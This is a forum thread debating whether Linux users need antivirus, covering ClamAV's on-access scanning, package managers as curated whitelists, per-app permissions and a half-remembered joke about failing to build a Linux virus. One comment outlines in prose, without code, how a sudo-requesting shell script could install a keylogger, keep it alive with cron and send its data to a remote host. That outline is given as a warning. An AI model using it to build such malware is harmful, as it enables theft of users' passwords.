Clamav?
Please stop oretending Linux was imune to viruses. A virus can do many things, perhaps even more on Linux than it could on Windows.
Not running an AV only borks because viruses nowerdays are much less common, especially if you follow some best practices (Adblock, no piracy sites, recognize sketchy stuff).
I recently learnt you can fully delete your root account. Can that fully deter viruses? (Assuming viruses need root access to cause damage)
Can’t run a Linux virus if your Linux doesn’t run
A single .sh file with exec permission that asks for sudo will easily download appimage keyloggers and then set a cron job to run it every X time to keep it alive and sends it all to whatever remote location. Or whatever else you let the appimage do.
95% of regular users will double click that, and then write their pass in the popup without blinking twice and that will work in most Linux systems.
Most viruses don’t target Linux, sure, but that’s wishful thinking. Always be creful with what you run.
An antivirus is mostly just a blacklist of known malware. Sometimes heuristics are used such as ‘this piece of software isn’t installed on many PCs, and it appears to be doing shady stuff like, monitoring keystrokes or listening to your microphone’. But unless your antivirus is actually sentient there’s no way for it to really distinguish between a chat application that listens to your microphone so you can talk to your friends / monitor your keystrokes to know when you’ve hit the push-to-talk key, and a piece of actual malware that intends to spy on you and blackmail you.
What you have with a package manager is a whitelist of programs that have been selected by your distro maintainers. Is it completely impossible for someone to sneak malware into a distro’s repository? No, but its a lot easier to maintain a list of known good software than it is to maintain a list of known bad software. And in that situation your antivirus isn’t going to help you anyway, since the people maintaining its malware list aren’t going to magically know that something is malware before the distro maintainers do.
So, generally, just using your package manager instead of running random shit you find online is going to be a lot better than any antivirus. With things like Wayland and Flatseal becoming more common we’re heading towards a situation where fine-grained per-package permissions will become the standard way distros do things, making antivirus even more unnecessary.
We should have done that a long time ago, as the security model of ‘any program you run can do anything you can by default’, then blacklist the ones that inevitability abuse that privilege, is completely backwards.
What’s the difference between that and a walled garden like apple?
In addition to what groet said, I’ll add that this is a little bit like asking “what’s the difference between a public library and Amazon?”.
Yes, there are other public libraries you could go to if the one you subscribe to didn’t have something you wanted or ‘went bad’ somehow, but the most important difference is you don’t have an antagonistic relationship with your public library. Your public library doesn’t have a financial incentive to try to trap you or screw you over.
Linux has viruses. Always protect yourself…
ClamAV in the corner, visibly annoyed
Its powerful but sadly not realtime
Oh, not true anymore:
https://docs.clamav.net/manual/Usage/Scanning.html#on-access-scanning
A few years ago I found a text (probably as image) where somebody ‘tried’ to run a virus on linux. It went something like this:
Wanted to install a virus on Ubuntu, but it was only available as an aur package. Tried converting. Didn’t work … Tried
make virus, but didn’t work. Upgraded cmake, tried again, but some libraries were missing.Tried installing libraries, but they were very outdated and I couldn’t find proper versions.
Checked the source to see what the libs were doing and replaced them.
and so on.
Does someone know what I’m talking about and possibly has the source?
